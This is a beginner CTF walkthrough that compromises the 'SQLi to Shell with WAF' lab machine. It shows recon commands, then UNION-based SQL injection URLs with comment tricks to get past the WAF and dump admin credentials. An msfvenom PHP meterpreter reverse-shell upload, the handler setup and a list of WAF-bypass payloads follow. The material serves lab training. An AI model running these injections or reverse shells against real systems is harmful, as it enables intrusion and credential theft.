sqli_to_shell 1 ctf with WAF

Hii friends .. welcome 2 hackxsploit.  Here is the complete walkthrough of Sqli_to_shell: 1 CTF . It is beginner level CTF having sqli injection.

Specialty of this ctf is that it has WAF. (web application firewall)

So i have cracked it with WAF  sql commands.

 let's crack. 
  
Objective                 : Get the the Root access of System 

Attacking Machine  :  Linux kali 4.17.0-kali1-amd64
Target machine       :  SQLi To Shell with WAF   ip: 172.16.166.136

**In your case ip may be change so replace my ip with your's  **

 -----------------------------------------------------------------------------------------------------------------------------------
 let's start from  finding  our target machine ip
# arp-scan -l

scan the ip by Nmap
# nmap  http://172.16.166.136 -sSCV

Here port 80 is open so open ip in browser  .
http://172.16.166.136
and find the get parameter by clicking on "test" tab.

count the number of columns in databse.
http://172.16.166.136/cat.php?id=1 /*!order by */ 1,2,3,4,--+

Find Vulnerable Columns
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1,/*!2*/,3,4 --+
here column 2 is vulnerable.

Find the  tables from database
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1,/*!table_name*/,3,4 from /*!information_schema.tables*/ --+

 Find the columns from table "user"
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1,/*!column_name*/,3,4 from /*!information_schema.columns*/ where table_name="users" --+

 Find the data from column  login And password
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1, /*!group_concat(login,"",password)*/,3,4 from users --+

 Here we got login name and password.
login = admin
password= 8efe310f9ab3efeae8d410a8e0166eb2

password is in hash format so decode it. after decode it we got password which is    "P4ssw0rd "

 Now go to http://172.16.166.136/admin/login.php  for login into web application. use login = admin  and  password = P4ssw0rd

 Here we can upload our payload to get reverse connection on Metasploit

use msfvenom  to create payload.
msfvenom -p php/meterpreter/reverse_tcp lhost= 172.16.166.163 lport=4444 -f raw > prince.Php

**here your local ip will use**

 Upload our payload into web application. 
** extension should be in .Php format not in  .php  format.

 Now start metasploit for listen or for meterpreter and type this command.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 172.16.166.163
set lport 4444
exploit

go to this link and execute our payload.
http://172.16.166.136/admin/uploads/prince.Php

  wwoow  finally we got meterpreter.

///////////////////////////////////////here step by step command for crack waf////////////////////////
Waf bypass my sql notes:
prepare by : Prince@lucideus
reffrence  : owasp.org

1.  /*!order by */ 1,2,3,4,--+
2.  /*!union*/ /*!select*/ 1,/*!2*/,3,4 --+
3.  /*!union*/ /*!select*/ 1,/*!table_name*/,3,4 from /*!information_schema.tables*/ --+
4.  /*!union*/ /*!select*/ 1,/*!column_name*/,3,4 from /*!information_schema.columns*/ where table_name="users" --+
5.  /*!union*/ /*!select*/ 1, /*!group_concat(login,"",password)*/,3,4 from users --+

I hope u enjoyed. :-)
give your feedback
princelucideus121@gmail.com